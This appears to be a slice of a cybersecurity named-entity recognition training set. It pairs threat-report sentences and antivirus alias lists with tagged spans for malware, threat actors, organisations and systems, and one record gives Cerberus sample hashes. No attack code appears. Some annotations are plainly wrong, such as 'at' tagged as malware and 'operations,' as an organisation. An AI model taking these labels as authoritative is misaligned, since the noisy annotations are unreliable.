{"text": "A backdoor also known as: Backdoor/W32.Amitis.827392 Backdoor.Amitis!GgBFlh0m/G4 W32/Amitis.MXVV-8538 Backdoor.Amitis Win32/Amitis.13 BKDR_AMITIS.B Trojan.Amitis.13-B Backdoor.Win32.Amitis.13 Trojan.Win32.Amitis.dbhy Backdoor.Win32.S.Amitis.827392.A[h] Backdoor.W32.Amitis.13!c Backdoor.Win32.Amitis.13 BackDoor.Amitist.13 Backdoor.Amitis.Win32.17 BKDR_AMITIS.B BehavesLike.Win32.Downloader.ch W32/Amitis.N@bd Backdoor/Amitis.p W32/Amitis.C!tr Trojan[Backdoor]/Win32.Amitis Win-Trojan/Amitis.827392 Backdoor:Win32/Amitis.1_3 Win32/Amitis.13 Backdoor.Amitis Win32.Backdoor.Amitis.Akfc Backdoor.Win32.Amitis BackDoor.Amitis.G Backdoor.Win32.Amitis.13", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007434", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HackTool.Patcher Backdoor.RBot.Win32.54805 Troj.GameThief.W32.Magania.lHhM Multi.Threats.InArchive W32.Pilleuz Win.Worm.Mytob-399 Trojan.Win32.Rbot.bhwabq Heur.Packed.Unknown Win32.HLLW.MyBot.based Trojan[Backdoor]/Win32.Rbot Trojan/Win32.Malco.R7515 Trj/CI.A Win32.Viking.BJ Backdoor.Win32.Rbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007435", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Mlw.ewdlbx TR/Dropper.lusig Trojan.Win32.Eightow Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007436", "source": "cyner2_train"}}
{"text": "Though Orcus has all the typical features of RAT malware, it allows users to build custom plugins and also has a modular architecture for better management and scalability.", "spans": {"MALWARE: Orcus": [[7, 12]], "MALWARE: RAT malware,": [[45, 57]], "SYSTEM: architecture": [[121, 133]]}, "info": {"id": "cyner2_train_007437", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Worm.SdDrop.C Worm.Sddrop W32/Sddrop.worm.c!p2p Win32.Worm.SdDrop.C Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Kwbot.Worm Unix.Tool.IRC-1 Win32.Worm.SdDrop.C P2P-Worm.Win32.SdDrop.c Win32.Worm.SdDrop.C Trojan.Win32.SdDrop.entp W32.W.SdDrop.c!c Win32.Worm.SdDrop.C Win32.Worm.SdDrop.C Win32.SdDrop.3 Worm.SdDrop.Win32.21 W32/Sddrop.worm.c!p2p Backdoor.Win32.SdBot I-Worm/P2P.SdDrop.c BDS/Sdbot.AA Worm[P2P]/Win32.SdDrop Worm:Win32/Sddrop.C P2P-Worm.Win32.SdDrop.c Trojan/Win32.HDC.C38855 Win32.Worm.SdDrop.C Backdoor.Sdbot Trj/CI.A Worm.SdDrop Win32/Sddrop.C Win32.Worm-p2p.Sddrop.Lknd Worm.P2P.SdDrop!LrfriCz8zKY W32/KWBot.E!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007438", "source": "cyner2_train"}}
{"text": "Recently, the FortiGuard Labs research team observed that a new variant of Poison Ivy was being spread through a compromised PowerPoint file.", "spans": {"ORGANIZATION: FortiGuard Labs research team": [[14, 43]], "MALWARE: new variant of Poison Ivy": [[60, 85]]}, "info": {"id": "cyner2_train_007439", "source": "cyner2_train"}}
{"text": "Many victims have discussed YiSpecter infections of their jailbroken and non-jailbroken iPhones in online forums and have reported the activity to Apple.", "spans": {"MALWARE: YiSpecter": [[28, 37]], "SYSTEM: jailbroken": [[58, 68]], "SYSTEM: non-jailbroken iPhones": [[73, 95]], "ORGANIZATION: Apple.": [[147, 153]]}, "info": {"id": "cyner2_train_007440", "source": "cyner2_train"}}
{"text": "The campaign operated out of handful of IPs, but we ended up finding in excess of 80K malicious subdomains associated with more than 500 domains leveraging various registrant accounts.", "spans": {"THREAT_ACTOR: campaign": [[4, 12]]}, "info": {"id": "cyner2_train_007443", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Udsdangerousobject.Multi TROJ_DLOADR.YLP TROJ_DLOADR.YLP Trojan.Win32.Dwn.dcbaru Trojan.Win32.Z.Tapaoux.49152 Trojan.DownLoader11.19325 W32/Trojan.FALA-2329 TR/Rogue.icdl Trojan.DownLoader! Trojan.Rogue", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007444", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL.Bladabindi.1 Win32.Trojan.WisdomEyes.16070401.9500.9922 Trojan.Win32.Bladabindi.etjjte Trojan.Win32.Z.Clicker.90624 Trojan.Win32.Clicker!BT BehavesLike.Win32.PWSZbot.mm Trojan.Win32.Clicker!BT Trj/Chgt.O Win32.Outbreak", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007445", "source": "cyner2_train"}}
{"text": "The file size of the malware is mostly around ~50Kb, as you can see from the list of sample hashes at the end of this report.", "spans": {"MALWARE: malware": [[21, 28]], "MALWARE: sample": [[85, 91]]}, "info": {"id": "cyner2_train_007448", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.YahooPass.Spyware Backdoor.Win32.Bredavi!O Backdoor.Bredavi.Win32.215 Backdoor.W32.Bredavi.kYWA Backdoor/Bredavi.le Win32.Trojan-PSW.Yahoo.a Backdoor.Trojan Win32/Bredolab.PS Win.Trojan.Bredolab-1635 Trojan.Win32.Krap.ihir Backdoor.Win32.Bredavi.348960 Application.Win32.Adware.Superjuan.~JAJ Trojan.BhoSpy.97 Trojan.Win32.Glecia Backdoor/Bredavi.bf BDS/Glecia.A Trojan[Backdoor]/Win32.Bredavi Adware.Heur.E51E88 Trojan/Win32.Bredavi.C83160 Backdoor.Bredavi Trj/Sinowal.WNX Win32/PSW.YahooPass.NAD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007451", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Email-Worm.Win32.Scano!O W32/Scano.bm WORM_SCANO.BT Win32.Worm.Scano.a W32.Areses.P@mm WORM_SCANO.BT Win.Worm.Scano-70 Email-Worm.Win32.Scano.bm Trojan.Win32.LdPinch.fmye I-Worm.Win32.A.Scano.105231 W32.W.Otwycal.l7h6 Win32.HLLM.Perf Worm.Scano.Win32.69 BehavesLike.Win32.Autorun.cm Email-Worm.Win32.Scano Worm/Scano.at W32.Worm.Areses Worm[Email]/Win32.Scano Email-Worm.Win32.Scano.bm Worm/Win32.Scano.R1851 BScope.Trojan-Dropper.Injector Win32/Scano.BM I-Worm.Scano!zrLOU/XMrws W32/Scano.AA@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007452", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Fsysna Win32.Trojan.WisdomEyes.16070401.9500.9969 Trojan.Win32.Fsysna.eqvl Trojan.Win32.Z.Strictor.607232.C Trojan.MulDrop7.49159 Trojan.Fsysna.Win32.15357 Trojan.MSIL.Spy TrojanSpy:MSIL/Logadat.A Trojan.Win32.Fsysna.eqvl Trojan.Fsysna Trj/GdSda.A Win32.Trojan.Fsysna.Lqym", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007453", "source": "cyner2_train"}}
{"text": "The report includes extra detail to help potential targets recognize similar attacks.", "spans": {}, "info": {"id": "cyner2_train_007454", "source": "cyner2_train"}}
{"text": "ThreatStream Labs recently became aware of a campaign beginning on 30 June 2015 by the omniprescent Wekby threat actors a/k/a TG-0416, APT-18, Dynamite Panda.", "spans": {"ORGANIZATION: ThreatStream Labs": [[0, 17]], "THREAT_ACTOR: campaign": [[45, 53]], "THREAT_ACTOR: Wekby": [[100, 105]], "THREAT_ACTOR: TG-0416, APT-18, Dynamite Panda.": [[126, 158]]}, "info": {"id": "cyner2_train_007455", "source": "cyner2_train"}}
{"text": "Adding this extra layer of filtering may help the group focus on targets of interest and evade detection due to use of known malware.", "spans": {"THREAT_ACTOR: group": [[50, 55]], "MALWARE: malware.": [[125, 133]]}, "info": {"id": "cyner2_train_007457", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W97M.Downloader TROJ_CVE201711882.E Exploit.Xml.CVE-2017-0199.equmby Xml.Exploit.Cve!c TROJ_CVE201711882.E Malicious_Behavior.SB DOC.S.Exploit.11442 XML/Dloader.S1 Exploit.CVE-2017-0199 XML.Exploit.CVE-2017-0199.E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007458", "source": "cyner2_train"}}
{"text": "It was a standalone utility with the name HDD Rootkit for planting a bootkit on a computer.", "spans": {"SYSTEM: standalone utility": [[9, 27]], "MALWARE: bootkit": [[69, 76]], "SYSTEM: computer.": [[82, 91]]}, "info": {"id": "cyner2_train_007460", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32/Goft.B Trojan.Win32.cvrsqp.eaqdwq Trojan.MyRunner BehavesLike.Win32.PWSZbot.nc Virus.Win32.AA Trojan/PSW.QQPass.fx Trojan/Win32.QQTail.R5474", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007461", "source": "cyner2_train"}}
{"text": "It provides the same functionality you would expect from a remote access tool: keylogging, webcam access, microphone access, remote desktop, URL download, program execution, etc.", "spans": {"MALWARE: remote access tool:": [[59, 78]]}, "info": {"id": "cyner2_train_007462", "source": "cyner2_train"}}
{"text": "Attacks that use completely fileless malware are a rare occurrence, so we thought it important to discuss a new trojan known as JS_POWMET Detected by Trend Micro as JS_POWMET.DE, which arrives via an autostart registry procedure.", "spans": {"MALWARE: fileless malware": [[28, 44]], "MALWARE: new trojan": [[108, 118]], "MALWARE: JS_POWMET": [[128, 137]], "ORGANIZATION: Trend Micro": [[150, 161]]}, "info": {"id": "cyner2_train_007463", "source": "cyner2_train"}}
{"text": "As you can see in the sample list below, this means that many school employees will have received this spam, as K-12 schools very commonly use .us domain names.", "spans": {"ORGANIZATION: school employees": [[62, 78]], "MALWARE: spam,": [[103, 108]]}, "info": {"id": "cyner2_train_007464", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.R W32/Virut.AM Win32/Virut.17408 Trojan.Scar PE_VIRUX.R Win.Trojan.Virtob-1456 Win32.Virus.Virut.U Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1938 BehavesLike.Win32.Virut.qh W32/Virut.AM Virus/Win32.Virut.ce Win32.Virut.dd.368640 W32.Virut.lqR9 Virus.Win32.Virut.ce Trojan:Win32/QHosts.BR Win32/Virut.F Virus.Virut.14 W32/Sality.AO Win32/Virut.NBP Trojan.Win32.Downloader.toh Trojan.Win32.Scar Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007465", "source": "cyner2_train"}}
{"text": "All of these attacks leveraged CVE-2014-4114 and were delivered via malicious Microsoft PowerPoint Slideshow files *.pps.", "spans": {"SYSTEM: Microsoft PowerPoint Slideshow files": [[78, 114]]}, "info": {"id": "cyner2_train_007468", "source": "cyner2_train"}}
{"text": "Brambul and Joanap appear to be used to download extra payloads and carry out reconnaissance on infected computers.", "spans": {"MALWARE: Brambul": [[0, 7]], "MALWARE: Joanap": [[12, 18]], "SYSTEM: infected computers.": [[96, 115]]}, "info": {"id": "cyner2_train_007469", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packed.Win32.Tibs!O Worm.Zhelatin Trojan.Heur.RP.fqWcaaXp5um Win32.Trojan.WisdomEyes.16070401.9500.9882 W32/Trojan.LQOD-4441 Trojan.Dropper Email-Worm.Win32.Zhelatin.rn Trojan.Win32.Z.Zhelatin.88576 MalCrypt.Indus! Trojan.Spambot.2559 Email.Worm.W32!c Email-Worm.Win32.Zhelatin.rn Worm/Win32.Zhelatin.R38109 BScope.Trojan.Zhelatin.12 Trj/CI.A Win32/Nuwar.BH Win32.Worm-email.Zhelatin.Sxxs Worm.Win32.Nuwar Win32/Worm.Email-Worm.43d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007473", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Rustock.NDU Backdoor.Win32.Rbot!O Backdoor.Rustock.NDU Backdoor.Rbot Win32.Trojan.WisdomEyes.16070401.9500.9989 W32/Trojan.TDBQ-4167 Backdoor.Rustock.B Win.Trojan.Crypt-278 Backdoor.Rustock.NDU Backdoor.Win32.Rbot.szn Backdoor.Rustock.NDU Backdoor.Win32.A.Rbot.70656.J Backdoor.Rustock.NDU Backdoor.Rustock.NDU Trojan.Fakealert.33205 BehavesLike.Win32.Downloader.kt Rootkit.KernelBot.m TR/Tiny.705 Backdoor.Rustock.NDU Backdoor.Win32.Rbot.szn Trojan:Win32/Silentbanker.B Worm/Win32.IRCBot.C36854 Backdoor.Rbot Trj/CI.A Win32.Backdoor.Rbot.Aiik Virus.Win32.Virut.n W32/RBot.SZN!tr.bdr Win32/Backdoor.0a5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007475", "source": "cyner2_train"}}
{"text": "During a recent United States Secret Service investigation, Trustwave encountered a new family of POS malware, that we named Punkey.", "spans": {"ORGANIZATION: United States Secret Service": [[16, 44]], "ORGANIZATION: Trustwave": [[60, 69]], "MALWARE: POS malware,": [[98, 110]], "MALWARE: Punkey.": [[125, 132]]}, "info": {"id": "cyner2_train_007476", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.FakeAV.29696.H Backdoor.Ziyazo Trojan.Graftor.D21706 TROJ_FAKEAV.ORH Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan.B TROJ_FAKEAV.ORH Win.Trojan.Ziyazo-1 Trojan.Win32.FakeAv.cuscpt Troj.W32.FakeAv.rxda!c Trojan.Fakealert.45728 Trojan.FakeAV.Win32.293288 BehavesLike.Win32.Backdoor.mc W32/Trojan.TSSV-1630 Trojan/Fakeav.blva Trojan/Win32.FakeAv Backdoor:Win32/Ziyazo.A Trojan/Win32.FakeAV.R94861 Trj/Dynamer.A Trojan.FakeAv!73pMuD6/3rE Trojan.Win32.FakeAV W32/FakeAv.RXDA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007477", "source": "cyner2_train"}}
{"text": "Subsequent to the publishing of this article, through cooperation with the parties responsible for the C2 domains, Unit 42 researchers successfully gained control of multiple C2 domains.", "spans": {"ORGANIZATION: Unit 42 researchers": [[115, 134]]}, "info": {"id": "cyner2_train_007478", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hacktool.Superscan Trojan.Win32.XFMP5368.dfvidz HackTool:Win32/SuperScan.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007480", "source": "cyner2_train"}}
{"text": "Lurk was believed to have siphoned over $45 million from financial organizations, ultimately disrupting the victims' operations, reputation, and bottom line.", "spans": {"THREAT_ACTOR: Lurk": [[0, 4]], "ORGANIZATION: financial organizations,": [[57, 81]], "ORGANIZATION: operations,": [[117, 128]]}, "info": {"id": "cyner2_train_007481", "source": "cyner2_train"}}
{"text": "While Empire RIG-E disappeared at the end of December after 4 months of activity on 2017-02-17 an advert for a new exploit kit dubbed Nebula appeared underground.", "spans": {"MALWARE: Empire RIG-E": [[6, 18]], "MALWARE: at": [[31, 33]], "MALWARE: a new exploit kit": [[109, 126]], "MALWARE: Nebula": [[134, 140]]}, "info": {"id": "cyner2_train_007482", "source": "cyner2_train"}}
{"text": "A powerful threat actor known as Wild Neutron also known as Jripbot and Morpho has been active since at least 2011, infecting high profile companies for several years by using a combination of exploits, watering holes and multi-platform malware.", "spans": {"THREAT_ACTOR: powerful threat actor": [[2, 23]], "THREAT_ACTOR: Wild Neutron": [[33, 45]], "THREAT_ACTOR: Jripbot": [[60, 67]], "THREAT_ACTOR: Morpho": [[72, 78]], "ORGANIZATION: high profile companies": [[126, 148]], "MALWARE: exploits, watering holes": [[193, 217]], "MALWARE: multi-platform malware.": [[222, 245]]}, "info": {"id": "cyner2_train_007483", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.Hacktool.Pipecmd.B HackTool.Pipecmd Win32.HackTool.Pipecmd.a Application.Hacktool.Pipecmd.B Application.Hacktool.Pipecmd.B Application.Hacktool.Pipecmd.B Trojan.Starter.5008 BehavesLike.Win32.PUP.lc Application.Hacktool.Pipecmd.B Trojan/Win32.Inject.C500093", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007486", "source": "cyner2_train"}}
{"text": "Following a three-month hiatus, Emotet spam activities resumed in March 2023, when a botnet known as Epoch 4 began delivering malicious documents embedded in Zip files that were attached to the emails.", "spans": {"MALWARE: Emotet": [[32, 38]], "MALWARE: botnet": [[85, 91]], "MALWARE: Epoch 4": [[101, 108]]}, "info": {"id": "cyner2_train_007488", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom.Sage.S1609000 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Trojan.TNMG-4793 Ransom.Cry Trojan.Win32.Yakes.etrgag BehavesLike.Win32.Ramnit.fc TR/AD.MalwareCrypter.zdeue Trojan.Zusy.D3FCFB Trojan/Win32.Yakes.C2201035 Trojan.Yakes Trojan.Yakes!KiOJwMzaTlA", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007489", "source": "cyner2_train"}}
{"text": "Bots can use various methods to establish a line of communication between themselves and their command-and-control C C server.", "spans": {"MALWARE: Bots": [[0, 4]]}, "info": {"id": "cyner2_train_007490", "source": "cyner2_train"}}
{"text": "Knowledge of the threat landscape and implementation of the right detection tools remains crucial to be able to protect yourself from fraud ; Cerberus is yet a new Trojan active in the wild ! Appendix Samples Some of the latest Cerberus samples found in the wild : App name Package name SHA 256 hash Flash Player com.uxlgtsvfdc.zipvwntdy 728a6ea44aab94a2d0ebbccbf0c1b4a93fbd9efa8813c19a88d368d6a46b4f4f Flash Player com.ognbsfhszj.hqpquokjdp fe28aba6a942b6713d7142117afdf70f5e731c56eff8956ecdb40cdc28c7c329 Flash Player com.mwmnfwt.arhkrgajn ffa5ac3460998e7b9856fc136ebcd112196c3abf24816ccab1fbae11eae4954c Flash Player com.wogdjywtwq.oiofvpzpxyo 6ac7e7ed83b4b57cc4d28f14308d69d062d29a544bbde0856d5697b0fc50cde4 Flash Player com.hvdnaiujzwo.fovzeukzywfr cfd77ddc5c1ebb8498c899a68ea75d2616c1c92a0e618113d7c9e5fcc650094b Flash Player com.gzhlubw.pmevdiexmn 3f2ed928789c200e21fd0c2095619a346f75d84f76f1e54a8b3153385850ea63 Target list The actual observed list of mobile apps targeted by Cerberus contains a total of 30 unique applications .", "spans": {"MALWARE: Cerberus": [[142, 150], [228, 236], [984, 992]], "SYSTEM: Flash Player": [[300, 312], [403, 415], [507, 519], [607, 619], [712, 724], [819, 831]]}, "info": {"id": "cyner2_train_007491", "source": "cyner2_train"}}
{"text": "CVE-2015-5122 was the second Adobe Flash zero-day revealed in the leak of HackingTeam's internal data.", "spans": {"SYSTEM: Adobe Flash": [[29, 40]], "VULNERABILITY: zero-day": [[41, 49]], "ORGANIZATION: HackingTeam's": [[74, 87]]}, "info": {"id": "cyner2_train_007492", "source": "cyner2_train"}}
{"text": "At the peak of procrastinators filing their taxes at the last minute, those who send in their tax forms are exactly the technically less-sophisticated users these kinds of campaigns target.", "spans": {}, "info": {"id": "cyner2_train_007493", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.Vesenlosow.1237156 Worm.Vesenlosow Worm.VB.Win32.13725 W32.W.Vesenlosow.luZW Trojan/VB.nzt WORM_VESENLO.SMA Win32.Worm.VB.m W32.Winiga WORM_VESENLO.SMA Trojan.Win32.Vesenlosow.bclidy Worm.Win32.A.Vesenlosow.909312 Trojan.MulDrop3.6950 BehavesLike.Win32.Rontokbro.tm Trojan.Win32.VB Worm/Vesenlosow.q WORM/VB.argu Trojan/Win32.VB Worm:Win32/Vesenlosow.A Trojan/Win32.VB.R46099 Trojan.Keylogger.1021 W32/Vobfus.GEP.worm Win32.Virut.NBP Win32/VB.NZT Win32.Worm.Vb.Akzk Worm.Win32.Msmm.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007495", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VB:Trojan.Valyria.1034 VBS/Downldr.IA W97M.Dropper TROJ_RUBREG.SM VB:Trojan.Valyria.1034 Trojan.Script.ExpKit.evbkht Troj.Downloader.Script!c VB:Trojan.Valyria.1034 VB:Trojan.Valyria.1034 VBS.DownLoader.1040 TROJ_RUBREG.SM VBS/Downloader.ea VBS/Downldr.IA TrojanDownloader:VBS/Vibrio.P VB:Trojan.Valyria.D40A VBS/Downloader.ea virus.vbs.houdini.b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007496", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Mydse!O TrojanDropper.Goriadu Win32.Trojan.WisdomEyes.16070401.9500.9578 TROJ_GORIADU.SMX Trojan.Win32.Mydse.az Trojan.Win32.Click.tdtvg TROJ_GORIADU.SMX BehavesLike.Win32.BadFile.fh Trojan-Clicker.ANTO TR/Clicker.9984610 Win32.Troj.AntiCloudAV.d.kcloud TrojanDropper:Win32/Goriadu.A!bit Trojan.Zusy.D38CD Trojan.Win32.Mydse.az W32/GORIADU.SMX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007497", "source": "cyner2_train"}}
{"text": "Who is affected ? Gooligan potentially affects devices on Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop ) , which is over 74 % of in-market devices today .", "spans": {"MALWARE: Gooligan": [[18, 26]], "SYSTEM: Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop )": [[58, 110]]}, "info": {"id": "cyner2_train_007498", "source": "cyner2_train"}}
{"text": "Figure 1 shows embedded URL in an Elirks sample found in early 2016.", "spans": {"MALWARE: Elirks": [[34, 40]]}, "info": {"id": "cyner2_train_007500", "source": "cyner2_train"}}
{"text": "This malware is well-known for its ability to steal credentials and quickly spread through an enterprise over network shares.", "spans": {"MALWARE: malware": [[5, 12]], "ORGANIZATION: enterprise": [[94, 104]], "SYSTEM: network shares.": [[110, 125]]}, "info": {"id": "cyner2_train_007501", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Adware.Heur.E101B3 Win32.Trojan.BHO.r Trojan.Win32.BHO.bropxr Adware.Softomate.603 Trojan:Win32/Jifcapi.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007502", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Kromebit TROJ_KROMEBIT.SM Win32.Trojan.WisdomEyes.16070401.9500.9982 TROJ_KROMEBIT.SM Trojan.Win32.Dwn.eurwpx Trojan.Win32.Z.Kromebit.1068032 Trojan.DownLoader25.50889 BehavesLike.Win32.Dropper.tt W32/Trojan.EJDN-0785 Trojan:Win32/Kromebit.B Trj/CI.A Trojan.Win32.Kromebit W32/KROMEBIT.SM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007503", "source": "cyner2_train"}}
{"text": "The report closes with some security suggestions, highlighting the importance of two-factor authentication.", "spans": {"SYSTEM: two-factor authentication.": [[81, 107]]}, "info": {"id": "cyner2_train_007505", "source": "cyner2_train"}}
{"text": "This week the spam party did not just include CERBER, but also decided to invite an old friend – the KOVTER family.", "spans": {"MALWARE: CERBER,": [[46, 53]], "MALWARE: the KOVTER family.": [[97, 115]]}, "info": {"id": "cyner2_train_007507", "source": "cyner2_train"}}
{"text": "Tofsee, also known as Gheg, is another botnet analyzed by CERT Polska.", "spans": {"MALWARE: Tofsee,": [[0, 7]], "MALWARE: Gheg,": [[22, 27]], "MALWARE: botnet": [[39, 45]], "ORGANIZATION: CERT Polska.": [[58, 70]]}, "info": {"id": "cyner2_train_007508", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Small.15616.H Trojan.Bibei.A6 Bibei.a Win.Trojan.Rootkit-3954 Trojan.Win32.NtRootKit.rigfr TrojWare.Win32.Olmarik.AWI Trojan.NtRootKit.12543 Bibei.a TR/Offend.69286423 Trojan.Zusy.D27F7 Trojan:WinNT/Bibei.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007511", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Propas.110663 Trojan.Heur.RP.EDD84E Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan.AQD TROJ_PASSPRO.C Win.Trojan.Enfal-62 Trojan.PWS.Winlog TROJ_PASSPRO.C BehavesLike.Win32.Dropper.ch W32/Trojan.IWQS-9238 Trojan:Win32/Propas.A Trojan:Win32/Propas.A Trojan.Propas!M9i4NRQV2R8 W32/Propas.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007515", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Syph.B Backdoor/W32.Syph.361984 Backdoor.Syph Backdoor.W32.Syph.b!c Trojan/Syph.b Backdoor.Syph.B Backdoor.Trojan BKDR_SYPH.B Win.Trojan.Syph-2 Backdoor.Syph.B Backdoor.Win32.Syph.b Backdoor.Syph.B Trojan.Win32.Syph.bfjuy Backdoor.Win32.Syph.361984 Win32.Backdoor.Syph.cyqv Backdoor.Syph.B Backdoor.Win32.Syph.B BackDoor.Syph BKDR_SYPH.B W32/Risk.GBZV-6047 Backdoor/Syph.b BDS/Syph.b.Srv Trojan[Backdoor]/Win32.Syph Backdoor:Win32/Syph.B Backdoor.Win32.Syph.b Backdoor.Syphillis Backdoor.Syph.b Bck/Syphillis.1.18 Win32/Syph.B Backdoor.Syph!hEmUZuSaZVQ Win32/Backdoor.e16", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007517", "source": "cyner2_train"}}
{"text": "From April 19-24, 2017, a politically-motivated, targeted campaign was carried out against numerous Israeli organizations.", "spans": {"THREAT_ACTOR: politically-motivated, targeted campaign": [[26, 66]], "ORGANIZATION: Israeli organizations.": [[100, 122]]}, "info": {"id": "cyner2_train_007518", "source": "cyner2_train"}}
{"text": "Although this technique has been used before by other malware campaigns, it is still not a common strategy.", "spans": {}, "info": {"id": "cyner2_train_007519", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9692 TR/Brysay.A PWS:Win32/Enesbot.A Trojan-Downloader.MSIL.Banload", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007522", "source": "cyner2_train"}}
{"text": "Yet I recently uncovered evidence that suggests it was the work of a well-known Chinese threat group.", "spans": {"THREAT_ACTOR: Chinese threat group.": [[80, 101]]}, "info": {"id": "cyner2_train_007524", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9982 Trojan.Win32.Farfli Backdoor:Win32/Dorbop.B!bit Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007525", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.AD.eqoszf TR/AD.PSLoader.kykon Trojan.Razy.D1F16C Win32/Powerless.F Trojan.Powerless! W32/Powerless.F!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007526", "source": "cyner2_train"}}
{"text": "We have labelled this threat group the Gamaredon Group and our research shows that the Gamaredon Group has been active since at least 2013.", "spans": {"THREAT_ACTOR: threat group the Gamaredon Group": [[22, 54]], "THREAT_ACTOR: the Gamaredon Group": [[83, 102]]}, "info": {"id": "cyner2_train_007527", "source": "cyner2_train"}}
{"text": "In our previous research, we detailed how an information stealer Trojan was deployed via a Word macro, in order to spy on its victims various parts of the Saudi Government.", "spans": {"MALWARE: information stealer Trojan": [[45, 71]], "MALWARE: Word macro,": [[91, 102]], "ORGANIZATION: the Saudi Government.": [[151, 172]]}, "info": {"id": "cyner2_train_007529", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FakeMsHelpCenter.Trojan Trojan.Graftor.D67ED Win32.Trojan.WisdomEyes.16070401.9500.9997 TROJ_ALTHUMS_EI030112.UVPM Trojan.Win32.DownLoad2.rlsdn Trojan.Win32.A.Downloader.84626 Trojan.DownLoad2.63614 Trojan.Allthumbs.Win32.1 TROJ_ALTHUMS_EI030112.UVPM BehavesLike.Win32.Worm.tz Trojan:Win32/Althums.A Trojan/Win32.Goz.R10705 Trj/CI.A Trojan.Graftor!H+8m5ivUpKY Win32/Trojan.0be", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007531", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BKDR_MATSNU.SM0 Win32.Trojan.WisdomEyes.16070401.9500.9999 BKDR_MATSNU.SM0 BehavesLike.Win32.Ransom.ch TR/Crypt.ZPACK.8577 Trojan/Win32.Trapwot.R152769 Trojan.FakeAV.01657", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007533", "source": "cyner2_train"}}
